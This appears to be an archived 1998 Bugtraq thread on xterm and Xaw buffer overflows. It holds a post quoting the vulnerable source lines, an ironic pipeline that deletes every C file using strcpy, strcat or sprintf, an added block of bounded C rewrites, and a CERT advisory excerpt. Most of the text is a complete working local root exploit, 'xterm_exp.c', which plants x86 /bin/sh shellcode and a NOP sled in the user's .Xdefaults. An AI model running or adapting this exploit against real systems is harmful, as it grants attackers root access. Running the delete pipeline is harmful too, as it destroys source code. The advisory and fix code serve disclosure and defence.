Date: Mon, 4 May 1998 11:06:05 +0200
From: Pavel Kankovsky <peak@kerberos.troja.mff.cuni.cz>
To: BUGTRAQ@NETSPACE.ORG
Subject: Re: TOG and xterm problem
On Fri, 1 May 1998, Jeff Gehlbach wrote:
> Open Group, when *will* the rest of us see at least some clues about where
> the bug lies and how it can be fixed? You say you won't release patches
> to X11R<6.4, but can you at least be nice enough to tell those of us using
> the still-perfectly-serviceable 6.3 just a tidbit about the problem?
Believe it or not, it took me 10 minutes to grep the appropriate parts of
X11R6.3 sources, following the clues mentioned in the CERT advisory, and
find the bugs--at least some of them.
xc/programs/xterm/charproc.c:
* HandleKeymapChange():
(void) sprintf( mapName, "%sKeymap", params[0] );
(void) strcpy( mapClass, mapName );
(actually, the second command is mostly harmless because the size of
mapName and mapClass is the same)
xc/programs/xterm/charproc.c:
* VTInitI18N():
strcpy(tmp, term->misc.input_method);
...
strcpy(buf, "@im=");
strcat(buf, s);
...
strcpy(tmp, term->misc.preedit_type);
xc/lib/Xaw/XawIm.c:
* OpenIM():
strcpy(modifiers, "@im=");
strcat(modifiers, ve->im.im_list[i]);
* ParseIMNameList():
char *s, *save_s, *ss, *list[32], **lp, *end;
...
list[i] = s;
(This one is quite interesting.
Exercise for the reader: write an exploit.)
<ironic>
Security hint of the day:
find . -name '*.[ch]' | \
xargs egrep -l 'sprintf|strcat|strcpy' | \
xargs rm
</ironic>
--Pavel Kankovsky aka Peak [ Boycott Microsoft--http://www.vcnet.com/bms ]
P.S. A copy of this message is being submitted to XFree86.
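The two patterns the message above points at (an unbounded strcpy/strcat of a resource value into a fixed buffer, and an unchecked index into `char *list[32]`) rewritten with explicit bounds, as an added example. This is not code from the post, from xterm or from Xaw; the function names, the buffer and list sizes, and the sample input are assumptions chosen for the illustration.

```c
/* Added example, not xterm/Xaw code: bounded versions of the two
 * resource-handling patterns named in the Bugtraq post. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define IM_MOD_BUFSZ 32   /* hypothetical fixed buffer size (assumption) */
#define IM_LIST_MAX  32   /* mirrors the list[32] mentioned in the post */

/* Build "@im=<name>" into dst, never writing past dstsz bytes.
 * Returns the length written, or -1 if the result would not fit.
 * The unbounded original was strcpy(buf,"@im="); strcat(buf,name); */
int build_im_modifier(char *dst, size_t dstsz, const char *name)
{
    const char *prefix = "@im=";
    size_t plen = strlen(prefix);
    size_t need = plen + strlen(name) + 1;       /* +1 for the NUL */
    if (dstsz == 0 || need > dstsz)
        return -1;                               /* refuse, do not overflow */
    memcpy(dst, prefix, plen);
    memcpy(dst + plen, name, strlen(name) + 1);  /* copies the NUL too */
    return (int)(need - 1);
}

/* Split a comma-separated input-method name list in place into out[],
 * storing at most max entries and returning how many were stored.
 * Entries beyond max are dropped instead of being written past out[].
 * Surrounding blanks are trimmed and empty items are skipped. */
size_t parse_im_name_list(char *list, char *out[], size_t max)
{
    size_t n = 0;
    char *s = list;
    while (s && *s) {
        char *end = strchr(s, ',');
        if (end)
            *end = '\0';                         /* terminate this item */
        while (*s == ' ' || *s == '\t')          /* trim leading blanks */
            s++;
        char *e = s + strlen(s);
        while (e > s && (e[-1] == ' ' || e[-1] == '\t'))
            *--e = '\0';                         /* trim trailing blanks */
        if (*s) {
            if (n >= max)
                break;                           /* bound reached: stop */
            out[n++] = s;
        }
        s = end ? end + 1 : NULL;
    }
    return n;
}

int main(void)
{
    /* Constructed sample values; not taken from any real .Xdefaults. */
    char buf[IM_MOD_BUFSZ];
    char too_long[] = "this-input-method-name-is-far-too-long-for-the-buffer";
    char list[] = "kinput2, xwnmo ,, htt";
    char *names[IM_LIST_MAX];
    size_t i, n;

    printf("short name -> %d\n", build_im_modifier(buf, sizeof buf, "kinput2"));
    printf("built: %s\n", buf);
    printf("long name  -> %d (rejected)\n",
           build_im_modifier(buf, sizeof buf, too_long));

    n = parse_im_name_list(list, names, IM_LIST_MAX);
    for (i = 0; i < n; i++)
        printf("name[%zu] = \"%s\"\n", i, names[i]);
    return 0;
}
```

The point of the bounded variants is that the caller decides what happens with an over-long resource value (here: a -1 return that the caller can log and ignore) rather than letting the copy decide by scribbling over the stack.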
/*
xterm_exp.c : linux/x86 xterm.Xaw exploit
by alcuin - 5/4/98 - [ http://www.rootshell.com/ ]
It works against both Xaw and neXtaw widgets
NB: you have to cp ~/.Xdefaults.old ~/.Xdefaults to be able to
use xterm again.
*/
#include <stdlib.h>
#include <stdio.h>
#include <ctype.h>
unsigned int getsp() {
asm("mov %esp,%eax");
}
inline rootshell(){
__asm__(
"movb $0x56, %al\n\t"
"l1:cmpb $0x12, %al\n\t"
"je l2\n\t"
"movb $0x12,%al\n\t"
"call l1\n\t"
"l2:pop %esi\n\t"
"xorl %eax,%eax\n\t"
"movb $0x25, %al\n\t"
"addl %eax,%esi\n\t"
"movl %esi,%ebx\n\t"
"movl %esi,%edi\n\t"
"movb $8,%al\n\t"
"addl %eax,%edi\n\t"
"movb $5,%al\n\t"
"addl %eax,%esi\n\t"
"movl %esi,(%edi)\n\t"
"movl %edi,%ecx\n\t"
"incl %edi\n\t"
"incl %edi\n\t"
"incl %edi\n\t"
"incl %edi\n\t"
"xorb %al,%al\n\t"
"movl %eax,(%edi)\n\t"
"movl %edi,%edx\n\t"
"movb $0xb,%al\n\t"
"int $0x80\n\t"
".string \"/bin/sh\"\n"
);
}
#define CONFFILE ".Xdefaults"
#define OLDFILE ".Xdefaults.old"
#define NEWFILE ".Xdefaults.new"
main (int argc, char **argv) {
char *home;
FILE *f_in, *f_out;
char buf[16384];
char shellbuf[16384];
char *s;
int i;
unsigned int sp=getsp();
if (home = getenv("HOME")) chdir(home);
if (!(f_out = fopen(NEWFILE, "w"))) {
perror("fopen");
exit(1);
}
if (f_in = fopen(CONFFILE, "r")) {
fseek(f_in,0,SEEK_SET);
while (!feof(f_in)) {
fgets(buf,16384,f_in);
for (s=buf;isblank(*s);s++);
if (strncmp(s,"xterm*inputMethod",17)<0)
fputs(buf,f_out);
}
fclose(f_in);
}
/* fill the buffer with nops */
memset(shellbuf, 0x90, sizeof(shellbuf));
shellbuf[sizeof(shellbuf)-1] = 0;
/* write the return address */
s = shellbuf+2052;
*(int *)s=sp+0x69F5;
/* write the root shell code */
s = shellbuf+2800;
strcpy(s,(char*)rootshell);
fputs("xterm*inputMethod:",f_out);
fputs(shellbuf, f_out);
fclose(f_out);
system("/bin/cp "CONFFILE" "OLDFILE);
system("/bin/mv -f "NEWFILE" "CONFFILE);
execl("/usr/X11R6/bin/xterm","xterm",NULL);
}
[ From CERT advisory VB-98.04 ]
I. Description
Vulnerabilities exist in the terminal emulator xterm(1), and the Xaw
library distributed in various MIT X Consortium; X Consortium, Inc.;
and The Open Group X Project Team releases. These vulnerabilities may
be exploited by an intruder to gain root access.
The resources and the releases affected by the xterm vulnerability are:
Release    inputMethod   preeditType   *Keymap
X11R3      NO            NO            YES
X11R4      NO            NO            YES
X11R5      NO            NO            YES
X11R6      NO            NO            YES
X11R6.1    YES           YES           YES
X11R6.2    YES           YES           YES
X11R6.3    YES           YES           YES
X11R6.4    YES           YES           YES
The resources and the releases affected by the Xaw library
vulnerability are:
Release    inputMethod   preeditType
X11R6      YES           YES
X11R6.1    YES           YES
X11R6.2    YES           YES
X11R6.3    YES           YES
X11R6.4    YES           YES
(X11R6.2 was not released to the public.)
The Open Group X Project Team has investigated the issue and recommends
the following steps for neutralizing the exposure. It is HIGHLY RECOMMENDED
that these measures be implemented on ALL vulnerable systems. This issue
will be corrected in future X Project Team releases of X11.